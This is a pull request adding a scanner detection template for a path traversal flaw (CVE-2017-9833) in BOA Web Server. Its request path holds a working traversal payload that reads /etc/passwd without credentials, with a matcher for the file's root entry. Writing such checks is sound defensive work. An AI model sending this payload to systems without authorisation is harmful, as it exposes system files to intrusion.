### PR TITLE
Create boa-web-fileread.yaml

### DIFF
--- a/boa-web-fileread.yaml
+++ b/boa-web-fileread.yaml
@@ -1,0 +1,27 @@
+id: boa-web-fileRead
+
+info:
+  name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
+  author: 0x_Akoko
+  severity: high
+  description: The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials.
+  reference:
+    - https://www.exploit-db.com/exploits/42290
+    - https://www.cvedetails.com/cve/CVE-2017-9833
+  tags: boa,fileread,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

### BOA Web Server 0.94.14 - Access to arbitrary files as privileges

The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials.

**Authentication : Not required (Authentication is not required to exploit the vulnerability.)**

Vendor Homepage : http://www.boa.org
- Reference:
    - https://www.exploit-db.com/exploits/42290
    - https://www.cvedetails.com/cve/CVE-2017-9833
    
### Template Validation

I've validated this template locally?
- YES